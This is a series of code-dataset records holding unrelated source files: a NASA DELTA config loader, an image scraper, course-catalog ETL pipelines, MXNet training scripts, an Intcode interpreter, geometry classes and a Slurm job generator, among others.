\"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os.path\n\nimport yaml\nimport pkg_resources\nimport appdirs\n\ndef validate_path(path, base_dir):\n if path == 'default':\n return path\n path = os.path.expanduser(path)\n # make relative paths relative to this config file\n if base_dir:\n path = os.path.normpath(os.path.join(base_dir, path))\n return path\n\ndef validate_positive(num, _):\n if num <= 0:\n raise ValueError('%d is not positive' % (num))\n return num\n\nclass DeltaConfigComponent:\n \"\"\"\n DELTA configuration component.\n\n Handles one subsection of a config file. Generally subclasses\n will want to register fields and components in the constructor,\n and possibly override setup_arg_parser and parse_args to handle\n command line options.\n\n section_header is the title of the section for command line\n arguments in the help.\n \"\"\"\n def __init__(self, section_header = None):\n \"\"\"\n Constructs the component.\n \"\"\"\n self._config_dict = {}\n self._components = {}\n self._fields = []\n self._validate = {}\n self._types = {}\n self._cmd_args = {}\n self._descs = {}\n self._section_header = section_header\n\n def reset(self):\n \"\"\"\n Resets all state in the component.\n \"\"\"\n self._config_dict = {}\n for c in self._components.values():\n c.reset()\n\n def register_component(self, component, name : str, attr_name = None):\n \"\"\"\n Register a subcomponent with a name and attribute name (access as self.attr_name)\n \"\"\"\n assert name not in self._components\n self._components[name] = component\n if attr_name is None:\n attr_name = name\n setattr(self, attr_name, component)\n\n def register_field(self, name : str, types, accessor = None, cmd_arg = None, validate_fn = None, desc = None):\n \"\"\"\n Register a field in this component of the configuration.\n\n types is a single type or a tuple of valid types\n\n validate_fn (optional) should take two strings as input, the field's value and\n the base directory, and return what to save to the config dictionary.\n It should raise an exception if the field is invalid.\n accessor is an optional name to create an accessor function with\n \"\"\"\n self._fields.append(name)\n self._validate[name] = validate_fn\n self._types[name] = types\n self._cmd_args[name] = cmd_arg\n self._descs[name] = desc\n if accessor:\n def access(self) -> types:\n return self._config_dict[name]#pylint:disable=protected-access\n access.__name__ = accessor\n access.__doc__ = desc\n setattr(self.__class__, accessor, access)\n\n def export(self) -> str:\n \"\"\"\n Returns a YAML string of all configuration options.\n \"\"\"\n exp = self._config_dict.copy()\n for (name, c) in self._components.items():\n exp[name] = c.export()\n return yaml.dump(exp)\n\n def _set_field(self, name : str, value : str, base_dir : str):\n if name not in self._fields:\n raise ValueError('Unexpected field %s in config file.' % (name))\n if value is not None and not isinstance(value, self._types[name]):\n raise TypeError('%s must be of type %s, is %s.' % (name, self._types[name], value))\n if self._validate[name] and value is not None:\n try:\n value = self._validate[name](value, base_dir)\n except:\n print('Value %s for %s is invalid.' % (value, name))\n raise\n self._config_dict[name] = value\n\n def _load_dict(self, d : dict, base_dir):\n \"\"\"\n Loads the dictionary d, assuming it came from the given base_dir (for relative paths).\n \"\"\"\n for (k, v) in d.items():\n if k in self._components:\n self._components[k]._load_dict(v, base_dir) #pylint:disable=protected-access\n else:\n self._set_field(k, v, base_dir)\n\n def setup_arg_parser(self, parser, components = None) -> None:\n \"\"\"\n Adds arguments to the parser. Must overridden by child classes.\n \"\"\"\n if self._section_header is not None:\n parser = parser.add_argument_group(self._section_header)\n for name in self._fields:\n c = self._cmd_args[name]\n if c is None:\n continue\n parser.add_argument(c, dest=c.replace('-', '_'), required=False,\n type=self._types[name], help=self._descs[name])\n\n for (name, c) in self._components.items():\n if components is None or name in components:\n c.setup_arg_parser(parser)\n\n def parse_args(self, options):\n \"\"\"\n Parse options extracted from an ArgParser configured with\n `setup_arg_parser` and override the appropriate\n configuration values.\n \"\"\"\n d = {}\n for name in self._fields:\n c = self._cmd_args[name]\n if c is None:\n continue\n n = c.replace('-', '_')\n if not hasattr(options, n) or getattr(options, n) is None:\n continue\n d[name] = getattr(options, n)\n self._load_dict(d, None)\n\n for c in self._components.values():\n c.parse_args(options)\n\nclass DeltaConfig(DeltaConfigComponent):\n \"\"\"\n DELTA configuration manager.\n\n Access and control all configuration parameters.\n \"\"\"\n def load(self, yaml_file: str = None, yaml_str: str = None):\n \"\"\"\n Loads a config file, then updates the default configuration\n with the loaded values.\n \"\"\"\n base_path = None\n if yaml_file:\n if not os.path.exists(yaml_file):\n raise Exception('Config file does not exist: ' + yaml_file)\n with open(yaml_file, 'r') as f:\n config_data = yaml.safe_load(f)\n base_path = os.path.normpath(os.path.dirname(yaml_file))\n else:\n config_data = yaml.safe_load(yaml_str)\n self._load_dict(config_data, base_path)\n\n def setup_arg_parser(self, parser, components=None) -> None:\n parser.add_argument('--config', dest='config', action='append', required=False, default=[],\n help='Load configuration file (can pass multiple times).')\n super().setup_arg_parser(parser, components)\n\n def parse_args(self, options):\n for c in options.config:\n self.load(c)\n super().parse_args(options)\n\n def reset(self):\n super().reset()\n self.load(pkg_resources.resource_filename('delta', 'config/delta.yaml'))\n\n def initialize(self, options, config_files = None):\n \"\"\"\n Loads the default files unless config_files is specified, in which case it\n loads them. Then loads options (from argparse).\n \"\"\"\n self.reset()\n\n if config_files is None:\n dirs = appdirs.AppDirs('delta', 'nasa')\n config_files = [os.path.join(dirs.site_config_dir, 'delta.yaml'),\n os.path.join(dirs.user_config_dir, 'delta.yaml')]\n\n for filename in config_files:\n if os.path.exists(filename):\n config.load(filename)\n\n if options is not None:\n config.parse_args(options)\n\nconfig = DeltaConfig()\n","sub_path":"delta/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"612956431","text":"import urllib.request\nimport re\nimport os\n\nweburl = \"http://www.douban.com/\"\nwebheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\nreq = urllib.request.Request(url=weburl, headers=webheaders) #构造请求报头\nwebpage = urllib.request.urlopen(req) #发送请求报头\ncontentBytes = webpage.read()\npiclink = set(re.findall(r'(https:[^\\s]*\\.(jpg|png|gif))', str(contentBytes)))\n\n\nsavedir = \"/Users/ww/picdata\"\nif not os.path.isdir(savedir):\n os.mkdir(savedir)\n\nfor link in piclink: #正则表达式查找所有的图片\n print(link[0])\n savepath = os.path.join(savedir, link[0][link[0].rindex('/')+1:])\n try:\n urllib.request.urlretrieve(link[0], savepath) #下载图片\n except:\n print('失败') #异常抛出","sub_path":"getpics.py","file_name":"getpics.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"149602365","text":"\"\"\"Display the given pyramid with step number accepted from user.\nEg: N=4\n1\n2 4\n3 6 9\n4 8 12 16\"\"\"\n\nn = int(input(\"enter the step number=\"))\n\nfor i in range(1, n + 1):\n for j in range(1, i + 1):\n print(i * j, \" \", end=\"\")\n print()","sub_path":"CO-2/pgm5.py","file_name":"pgm5.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"39478931","text":"from math import prod\n\nSLOPES_TO_CHECK = ((1,1), (3, 1), (5, 1), (7, 1), (1, 2))\n\nwith open(\"day3-input.txt\") as file:\n data = file.readlines()\n\nmap_width = len(data[0]) - 1\n\ndef check_slope(right, down):\n # start in x_position 0\n x_position = 0\n tree_count = 0\n\n # move down by down\n for row in data[down::down]:\n # move across right and use modulus to wrap\n x_position = (x_position + right) % map_width\n # check if new position is a tree and increment count\n if row[x_position] == \"#\":\n tree_count += 1\n return tree_count\n\nprint(prod([check_slope(*slope) for slope in SLOPES_TO_CHECK]))\n","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"30153623","text":"\"\"\"ETL pipelines\"\"\"\nfrom toolz import compose, first, juxt, curry\n\nfrom course_catalog.etl import (\n micromasters,\n loaders,\n see,\n mitpe,\n mitx,\n xpro,\n ocw,\n oll,\n video,\n youtube,\n)\nfrom course_catalog.etl.utils import log_exceptions\nfrom course_catalog.constants import PlatformType\n\n# A few notes on how this module works:\n#\n# - Each pipeline is composed right-to-left\n# - We define normalized loaders of data in loaders.py\n# - Each integration must define an extraction function to fetch the data\n# - Each integration must define an transformation function to normalize the data\n# - Each step is wrapped with log_exceptions and propogates and empty value forward (usually [])\n# - This keeps exceptions from being raised all the way up and provides contextual data for the failure\n# - Additional specifics are commented on as needed\nload_programs = curry(loaders.load_programs)\n\nmicromasters_etl = compose(\n load_programs(PlatformType.mitx.value), micromasters.transform, micromasters.extract\n)\n\nxpro_programs_etl = compose(\n load_programs(PlatformType.xpro.value),\n xpro.transform_programs,\n xpro.extract_programs,\n)\nxpro_courses_etl = compose(\n loaders.load_courses, xpro.transform_courses, xpro.extract_courses\n)\n\nmitx_etl = compose(\n loaders.load_courses,\n # take the first argument (the output of mitx.tranform)\n first,\n # duplicate the raw responses into two streams between our transformation code and the ocw/mitx manifest upload\n juxt(\n log_exceptions(\"Error tranforming MITx response\", exc_return_value=[])(\n mitx.transform\n ),\n # for the sake of not touching OCW code, we've implementing this function here in discussions\n # it takes the concatenated raw results from MITx and uploads them as a json file to the OCW bucket\n # we'll probably do away with this at later date when we can easily move it into OCW\n log_exceptions(\"Error uploading MITx manifest to OCW\")(\n ocw.upload_mitx_course_manifest\n ),\n ),\n log_exceptions(\"Error extracting MITx catalog\", exc_return_value=[])(mitx.extract),\n)\n\noll_etl = compose(loaders.load_courses, oll.transform, oll.extract)\n\nsee_etl = compose(loaders.load_courses, see.transform, see.extract)\n\nmitpe_etl = compose(loaders.load_courses, mitpe.transform, mitpe.extract)\n\nyoutube_etl = compose(loaders.load_video_channels, youtube.transform, youtube.extract)\n\n# pipeline for generating topic data for videos based on course topics\nvideo_topics_etl = compose(loaders.load_videos, video.extract_videos_topics)\n","sub_path":"course_catalog/etl/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"490972161","text":"\n# Unite\nunite_ip = '172.20.14.123'\nunite_ssh_usr = 'secret'\nunite_ssh_pwd = 'secret'\n\nudb_path = 'mnt/data/databases'\nudb_files = ['mscAlias.db','uns.db','uus.db']\n\n# ProX\nprox_ip = ''\nprox_url = 'http://wsrodproxstage/UserService/UserService.svc?wsdl'\ndb_ip = 'wsrodproxstage'\n#prox_url = 'http://GSEAT961/UserService/UserService.svc?wsdl'\n\n#db_ip = 'GSEAT961'\nprox_ssh_usr = ''\nprox_ssh_pwd = ''\n\npdb_path = ''\npdb_files = []\n\nprox_frnt_ip = ''\nprox_frnt_usr = ''\nprox_frnt_pwd = ''\n\n# database\n\n\n\nlog_file_path = '../logs/'\nproject_name = 'prox'\nbuild = 'no_build'","sub_path":"TAS/src/deprecated/prox_settings_old/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95048911","text":"import argparse\nimport collections\n\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nfrom torchvision import transforms\n\nfrom retinanet import model\nfrom retinanet.dataloader import CSVDataset, collater, Resizer, AspectRatioBasedSampler, Augmenter, \\\n Normalizer\nfrom torch.utils.data import DataLoader\n\nfrom retinanet import csv_eval\n\nassert torch.__version__.split('.')[0] == '1'\n\nprint('CUDA available: {}'.format(torch.cuda.is_available()))\n\n\ndef eval(retinanet, dataloader_test):\n retinanet = retinanet.cuda()\n\n # sampler_val = AspectRatioBasedSampler(dataloader_test, batch_size=1, drop_last=False)\n # dataloader_val = DataLoader(dataloader_test, num_workers=0, collate_fn=collater, batch_sampler=sampler_val)\n retinanet.eval()\n with torch.no_grad():\n train_loss = 0\n total = 0\n\n epoch_loss = []\n\n for iter_num, data in enumerate(dataloader_test):\n\n if torch.cuda.is_available():\n classification_loss, regression_loss = retinanet([data['img'].cuda().float(), data['annot']])\n else:\n classification_loss, regression_loss = retinanet([data['img'].float(), data['annot']])\n\n classification_loss = classification_loss.mean()\n regression_loss = regression_loss.mean()\n\n loss = classification_loss + regression_loss\n total = total + 1\n train_loss = train_loss + regression_loss\n\n\n print(\n 'Epoch: {} | Iteration: {} | Classification loss: {:1.5f} | Regression loss: {:1.5f}'.format(\n 0, iter_num, float(classification_loss), float(regression_loss)))\n\n loss = train_loss / total\n return loss\n # print(\"loss \", loss)\n","sub_path":"my_evel.py","file_name":"my_evel.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105284829","text":"import pygame\nimport board\nimport time\n\nif __name__==\"__main__\":\n reversi = board.Board(100, 8)\n reversi.draw()\n\n while True:\n\n reversi.make_candidate()\n\n events = pygame.event.get()\n\n for event in events:\n if event.type == pygame.MOUSEBUTTONUP:\n x, y = pygame.mouse.get_pos()\n reversi.click_event(x, y)","sub_path":"MyReversi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"404045709","text":"from enum import Enum\nfrom defaultlist import defaultlist\n\n\nclass InstructionType(Enum):\n ADD = 1\n MULTIPLY = 2\n INPUT = 3\n OUTPUT = 4\n JUMP_IF_TRUE = 5\n JUMP_IF_FALSE = 6\n LESS_THAN = 7\n EQUALS = 8\n ADJUST_RELATIVE_BASE = 9\n HALT = 99\n\n\nclass ParameterMode(Enum):\n POSITION = 0\n IMMEDIATE = 1\n RELATIVE = 2\n\n\nclass IntcodeProgram(object):\n num_params = {\n InstructionType.ADD: 3,\n InstructionType.MULTIPLY: 3,\n InstructionType.INPUT: 1,\n InstructionType.OUTPUT: 1,\n InstructionType.JUMP_IF_TRUE: 2,\n InstructionType.JUMP_IF_FALSE: 2,\n InstructionType.LESS_THAN: 3,\n InstructionType.EQUALS: 3,\n InstructionType.ADJUST_RELATIVE_BASE: 1,\n InstructionType.HALT: 0,\n }\n\n def __init__(self, code: str):\n self.code = defaultlist(lambda: 0)\n for s in code.split(','):\n self.code.append(int(s))\n # self.code = [int(s) for s in code.split(',')]\n self.cursor = 0\n self.relative_base = 0\n self.halt = False\n self.input = []\n self.output = []\n\n def read_input(self, value):\n self.input.append(value)\n\n def read_inputs(self, values):\n self.input += values\n\n def read_output(self):\n return self.output.pop(0)\n\n def execute_next(self):\n FULL_DEBUG = False\n\n opcode = self.code[self.cursor]\n if FULL_DEBUG:\n print(\"{}: {} (relbase {})\".format(self.cursor, opcode, self.relative_base))\n\n instruction = InstructionType(int(str(opcode)[-2:]))\n num_p = self.num_params[instruction]\n parameter_modes = [ParameterMode.POSITION]*num_p\n for idx, char in enumerate(reversed(str(opcode)[:-2])):\n parameter_modes[idx] = ParameterMode(int(char))\n values = self.values(parameter_modes)\n addresses = self.addresses(parameter_modes)\n\n if FULL_DEBUG:\n print(instruction.name, parameter_modes, values, addresses)\n\n increment_cursor = True\n if instruction == InstructionType.ADD:\n self.code[addresses[2]] = values[0] + values[1]\n elif instruction == InstructionType.MULTIPLY:\n self.code[addresses[2]] = values[0] * values[1]\n elif instruction == InstructionType.INPUT:\n self.code[addresses[0]] = self.input.pop(0)\n elif instruction == InstructionType.OUTPUT:\n self.output.append(values[0])\n elif instruction == InstructionType.JUMP_IF_TRUE:\n if values[0]:\n self.cursor = values[1]\n increment_cursor = False\n elif instruction == InstructionType.JUMP_IF_FALSE:\n if not values[0]:\n self.cursor = values[1]\n increment_cursor = False\n elif instruction == InstructionType.LESS_THAN:\n self.code[addresses[2]] = 1 if values[0] < values[1] else 0\n elif instruction == InstructionType.EQUALS:\n self.code[addresses[2]] = 1 if values[0] == values[1] else 0\n elif instruction == InstructionType.ADJUST_RELATIVE_BASE:\n self.relative_base += values[0]\n elif instruction == InstructionType.HALT:\n self.halt = True\n\n if increment_cursor:\n self.cursor += num_p + 1\n\n if FULL_DEBUG:\n print(self.code)\n\n def execute(self):\n while not self.halt:\n self.execute_next()\n\n def execute_until_output(self):\n while not self.output and not self.halt:\n self.execute_next()\n\n def values(self, parameter_modes):\n return [\n self.code[self.cursor+jdx+1] if parameter_modes[jdx] == ParameterMode.IMMEDIATE\n else self.code[self.relative_base+self.code[self.cursor+jdx+1]] if parameter_modes[jdx] == ParameterMode.RELATIVE\n else self.code[self.code[self.cursor+jdx+1]] # if parameter_modes[jdx] == ParameterMode.POSITION\n for jdx in range(len(parameter_modes))\n ]\n\n def addresses(self, parameter_modes):\n return [\n self.relative_base + self.code[self.cursor+jdx+1] if parameter_modes[jdx] == ParameterMode.RELATIVE\n else self.code[self.cursor+jdx+1]\n for jdx in range(len(parameter_modes))\n ]\n\n def params(self, parameter_modes):\n return [self.code[self.cursor+jdx+1] for jdx in range(len(parameter_modes))]\n\n\ndef test_1():\n code = \"109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99\"\n prog = IntcodeProgram(code)\n prog.execute()\n return 'Passed' if prog.output == [int(s) for s in code.split(',')] else 'Failed'\n\n\ndef test_2():\n code = \"1102,34915192,34915192,7,4,7,99,0\"\n prog = IntcodeProgram(code)\n prog.execute()\n return 'Passed' if len(str(prog.output[0])) == 16 else 'Failed'\n\n\ndef test_3():\n code = \"104,1125899906842624,99\"\n prog = IntcodeProgram(code)\n prog.execute()\n return 'Passed' if prog.output[0] == 1125899906842624 else 'Failed'\n\n\nif __name__ == \"__main__\":\n # print(\"Test 1:\", test_1())\n # print(\"Test 2:\", test_2())\n # print(\"Test 3:\", test_3())\n\n with open('input/dec9.txt', 'r') as file:\n program_code = file.readline()\n\n program = IntcodeProgram(program_code)\n program.read_input(2)\n program.execute()\n print(program.output)\n","sub_path":"2019/dec9.py","file_name":"dec9.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"196152435","text":"__author__ = 'saintdragon2'\n\nimport math\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return '(' + str(self.x) + ', ' + str(self.y) + ')'\n\n def distance(self, other):\n return ((other.x - self.x)**2 + (other.y - self.y)**2)**0.5\n\n\nclass Shape:\n def __init__(self):\n self.vertices = []\n\n def circumference(self):\n length = 0\n for i in range(0, len(self.vertices)-1):\n length += self.vertices[i].distance(self.vertices[i+1])\n\n length += self.vertices[0].distance(self.vertices[-1])\n return length;\n\n def center(self):\n min_x = 10e6\n max_x = -10e6\n\n min_y = 10e6\n max_y = -10e6\n\n for p in self.vertices:\n if p.x > max_x:\n max_x = p.x\n if p.x < min_x:\n min_x = p.x\n\n if p.y > max_y:\n max_y = p.y\n if p.x < min_y:\n min_y = p.y\n\n mid_point = Point((max_x+min_x)/2, (max_y+min_y)/2)\n\n return mid_point\n\n def area(self):\n p_0 = self.vertices[0]\n\n sum_area = 0\n\n for i in range(0, len(self.vertices)-2):\n p_1 = self.vertices[i]\n p_2 = self.vertices[i+1]\n\n triangle = Triangle(p_0, p_1, p_2)\n sum_area += triangle.area()\n\n return sum_area\n\n\n\n\nclass Triangle(Shape):\n def __init__(self, a, b, c):\n self.vertices = [a, b, c]\n\n def area(self):\n a = self.vertices[0].distance(self.vertices[1])\n b = self.vertices[1].distance(self.vertices[2])\n c = self.vertices[2].distance(self.vertices[0])\n\n s = (a + b + c) / 2\n\n return math.sqrt( s * (s-a) * (s-b) * (s-c) )\n\n\nclass Square(Shape):\n def __init__(self, a, b, c, d):\n self.vertices = [a, b, c, d]\n\n\nclass Pentagon(Shape):\n def __init__(self, a, b, c, d, e):\n self.vertices = [a, b, c, d, e]\n\n\np = Point(0, 0)\nq = Point(3, 0)\nr = Point(3, 4)\ns = Point(0, 4)\nt = Point(-2, 2)\n\nprint(p.distance(q))\nprint(p.distance(r))\n\ntriangle = Triangle(p, q, r)\n\nfor point in triangle.vertices:\n print(point.x)\n\n\nprint(triangle.circumference())\nprint('area')\nprint(triangle.area())\n\nsquare = Square(p, q, r, s)\nprint(square.circumference())\nprint(square.center().x)\nprint(square.center().y)\nprint(square.center())\nprint('sqaure_area')\nprint(square.area())\n\npenta = Pentagon(p, q, r, s, t)\nprint(penta.circumference())\nprint('penta_area')\nprint(penta.area())","sub_path":"shape_class_civil/Shape.py","file_name":"Shape.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"94761309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 21 08:55:02 2018\n\n@author: gilbe\n\"\"\"\n\n\"\"\"MXNet symbol API\ntransformers can be implemened in mxnet to use\ngpu computations on the tensor and speed calculations\nat the same time mxnet supports composition of transformers\n\n\"\"\"\nimport logging\nlogging.getLogger().setLevel(logging.INFO)\nimport numpy as np\nimport pandas as pd\nfrom utils.utils import PROJECT_DATA_DIR\nimport os\nimport mxnet as mx\nimport mxnet.ndarray as nd\nfrom time import time\nfrom sklearn.preprocessing import StandardScaler, QuantileTransformer\nfrom load_preprocess import (load_data,\n get_xy,\n scale_data,\n binarize_y,\n prepare_data)\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n#ctx = mx.gpu() if mx.test_utils.list_gpus() else mx.cpu()\n\n\n\ndef train_dnn(train_iter, val_iter,\n hidden_units=[1200, 500, 75],\n num_outputs=1, batch_size=2**9):\n \"\"\" ---Model for binary classification---\n TODO: implement the layers with a for loop, see\n the example jupyter notebook. Also remember to use\n enumerate in for loop to get the indeces and values\n in hidden_units\n \"\"\"\n # set the context on GPU is available otherwise CPU\n\n train_iter.reset()\n val_iter.reset()\n\n net = mx.sym.Variable('data')\n net = mx.sym.FullyConnected(\n net,\n name='fc1',\n num_hidden=hidden_units[0])\n\n net = mx.sym.Activation(\n net,\n name='relu1',\n act_type='relu')\n\n net = mx.sym.FullyConnected(\n net,\n name='fc2',\n num_hidden=hidden_units[1])\n\n net = mx.sym.Activation(\n net,\n name='relu2',\n act_type='relu')\n\n net = mx.sym.FullyConnected(\n net,\n name='fc3',\n num_hidden=hidden_units[2])\n\n net = mx.sym.Activation(\n net,\n name='relu3',\n act_type='relu')\n\n net = mx.sym.FullyConnected(\n net,\n name='out',\n num_hidden=num_outputs)\n\n net = mx.sym.LogisticRegressionOutput(\n net,\n name='softmax')\n\n mod = mx.mod.Module(net, context=mx.gpu())\n # pass shapes of iterators to allocate space\n mod.bind(data_shapes=train_iter.provide_data,\n label_shapes=train_iter.provide_label)\n mod.init_params(initializer=mx.init.Xavier())\n mod.init_optimizer(\n optimizer='Adam',\n optimizer_params=(('learning_rate', 0.01), ))\n\n mod.fit(train_data=train_iter,\n eval_data=val_iter,\n optimizer='Adam',\n optimizer_params={'learning_rate': 0.01},\n eval_metric='acc',\n num_epoch=20,\n batch_end_callback = mx.callback.Speedometer(batch_size, 100),\n )\n\n\n# Test implementing lstm in mxnet\ndef train_lstm(train_iter, val_iter,\n hidden_units=[1200, 500, 75],\n num_outputs=1):\n net_lstm = mx.sym.Variable('data')\n weight = mx.sym.Variable('weight', init=mx.init.Zero())\n bias = mx.sym.Variable('bias', init=mx.init.Zero())\n# rnn_h_init = mx.sym.Variable('LSTM_init_h')\n# rnn_c_init = mx.sym.Variable('LSTM_init_c')\n# rnn_params = mx.sym.Variable('LSTM_bias')\n\n num_hidden = 20\n num_lstm_layer = 1\n\n# net = mx.sym.transpose(net, (1, 0, 2))\n # maybe use mx.sym.transpose(data, axes=(1, 0, 2)) ?? (time, batch, columns)\n net_lstm = mx.sym.RNN(\n net_lstm,\n num_layers=num_lstm_layer,\n state_size=num_hidden,\n name='rnn_lstm1',\n mode='lstm',\n# state=rnn_h_init,\n# state_cell=rnn_c_init,\n parameters=weight,\n p=0.4)\n\n net_lstm = mx.sym.FullyConnected(\n net_lstm,\n name='out',\n num_hidden=num_outputs)\n\n net_lstm = mx.sym.LogisticRegressionOutput(\n net_lstm,\n name='softmax')\n\n mod = mx.mod.Module(net_lstm, context=mx.gpu())\n\n mod.bind(data_shapes=train_iter.provide_data,\n label_shapes=train_iter.provide_label)\n\n \"\"\"Xavier not accepted for initialization in LSTM\"\"\"\n mod.init_params(mx.initializer.Uniform(scale=1.0))\n\n mod.init_optimizer(optimizer='Adam',\n optimizer_params=(('learning_rate', 0.01)))\n\n metric = mx.metric.create('acc')\n for epoch in range(20):\n train_iter.reset()\n for batch in train_iter:\n print('shape of batch:', batch.data[0].shape)\n print(batch.data[0].asnumpy())\n break\n predictions = mod.forward(batch, is_train=True)\n# mod.metric_updeta(labels=)\n mod.backward()\n mod.update()\n print('Epoch %d, Training %s' % (epoch))\n\n\n\n# mod.fit(train_data=train_iter,\n# eval_iter=val_iter,\n# optimizer='Adam',\n# optimizer_params={'learning_rate': 0.01},\n# eval_metric='acc',\n# num_epoch=20)\n\n\ndef main():\n train = load_data(file='all_training_400_minisensor_1.csv')\n test = load_data(file='all_test_400_minisensor.csv')\n xtrain, ytrain, xtest, ytest = prepare_data(train, test, binary_class=True)\n xtrain_sc, xtest_sc = scale_data(xtrain, xtest)\n print(xtrain.head())\n print('')\n print(ytrain.head())\n print('xtrain.shape:', xtrain.shape)\n print('xtest.shape:', xtest.shape)\n print('ytrain.shape:', ytrain.shape)\n print('ytest.shape:', ytest.shape)\n\n xtrain_mx = mx.nd.array(xtrain_sc, dtype=np.float32)\n ytrain_mx = mx.nd.array(ytrain.reshape(-1, 1))\n xtest_mx = mx.nd.array(xtest_sc, dtype=np.float32)\n ytest_mx = mx.nd.array(ytest.reshape(-1, 1))\n batch_size=2**9\n\n train_iter = mx.io.NDArrayIter(\n xtrain_mx,\n ytrain_mx,\n batch_size=batch_size,\n shuffle=True)\n\n val_iter = mx.io.NDArrayIter(\n xtest_mx,\n ytest_mx,\n batch_size=batch_size)\n\n train_dnn(train_iter, val_iter)\n\n xtrain_lstm = xtrain.values.reshape(-1, 3)\n xtest_lstm = xtest.values.reshape(-1, 3)\n scaler = QuantileTransformer(output_distribution='normal')\n xtrain_lstm_sc = scaler.fit_transform(xtrain_lstm)\n xtest_lstm_sc = scaler.transform(xtest_lstm)\n\n print(xtrain_lstm_sc.shape)\n print(xtest_lstm_sc.shape)\n \"\"\" Change time steps from 400 to 20 to test if this is the problem\"\"\"\n xtrain_lstm_sc = mx.nd.array(xtrain_lstm_sc.reshape(-1, 400, 3))\n val_lstm_sc = mx.nd.array(xtest_lstm_sc.reshape(-1, 400, 3))\n print('shape of xtrain_lstm_sc:', xtrain_lstm_sc.shape)\n\n # transform to mxnet array\n train_lstm_iter = mx.io.NDArrayIter(\n xtrain_lstm_sc,\n ytrain_mx,\n batch_size,\n shuffle=True,\n last_batch_handle='discard')\n\n val_lstm_iter = mx.io.NDArrayIter(\n val_lstm_sc,\n ytest_mx,\n batch_size,\n shuffle=False,\n last_batch_handle='discard')\n\n print('Start training lstm with mxnet...')\n train_lstm(train_lstm_iter, val_lstm_iter)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n","sub_path":"code/DL_mxnet_symbol.py","file_name":"DL_mxnet_symbol.py","file_ext":"py","file_size_in_byte":7229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"514257284","text":"from handlers.base import BaseHandler\nimport tools.file_helper\n\n\nclass PublicFilesHandler(BaseHandler):\n def prepare(self):\n self.get_login_user()\n\n async def get(self):\n files_list = tools.file_helper.list_files(\"public_files\")\n await self.write_res(0, data=files_list)\n\n async def post(self):\n file_metas = self.request.files[\"PublicFiles\"]\n tools.file_helper.write_upload_files(file_metas, \"public_files\")\n await self.write_res(0, \"Upload Successfully\", None)\n\n async def delete(self):\n filename = self.get_argument('filename')\n result = tools.file_helper.delete_file(\"public_files\", filename)\n await self.write_res(0 if result else 1, \"Delete Successfully\" if result else \"File Not Exist\")\n","sub_path":"server/handlers/files_management/public_files.py","file_name":"public_files.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"231975202","text":"#!/usr/bin/env python\nimport subprocess,time,datetime,os\nfrom tqdm import tqdm\n\nnetworks=['vgg-16','resnet-34']\ntarget='llvm '\nbatchs=['4']\nthreads=['4']\nopts=['0','1','2','3','4']\n\nbasetext='''#!/bin/bash \n#SBATCH -J _name \n#SBATCH -o inference/%j._name.out\n#SBATCH -t 1-20:00:00\n#SBATCH --nodes=1\n#SBATCH --ntasks=1\n#SBATCH --tasks-per-node=1\n#SBATCH --cpus-per-task=4\n#SBATCH -p cpu-xg6230\n#SBATCH --nodelist=n14\n\nset echo on\ncd $SLURM_SUBMIT_DIR\necho \"SLURM_SUBMIT_DIR=$SLURM_SUBMIT_DIR\"\n\nsrun -l /bin/hostname\nsrun -l /bin/pwd\nsrun -l /bin/date\n\nmodule purge\nmodule load postech\ndate\nsource env/bin/activate\n/home/jaehunryu/linux/tools/perf/perf stat -d -d -d python3 /home/jaehunryu/workspace/tvm/optimization_tvm/naive.py --opt_level=_opt --network=_network --batch=4 \n\nsqueue --job $SLURM_JOBID\n'''\nos.makedirs('/home/jaehunryu/workspace/tvm/optimization_tvm/inference',exist_ok=True)\nsript='sbatch slurm_inference.sh'\n_list=[]\nfor network in networks:\n for opt in opts:\n _list.append([network,opt])\n \n \nfor idx,pack in enumerate(_list):\n network,opt=pack\n _name='nework_'+network+'_optlevel_'+opt\n\n text=basetext\n text=text.replace('_opt',opt)\n 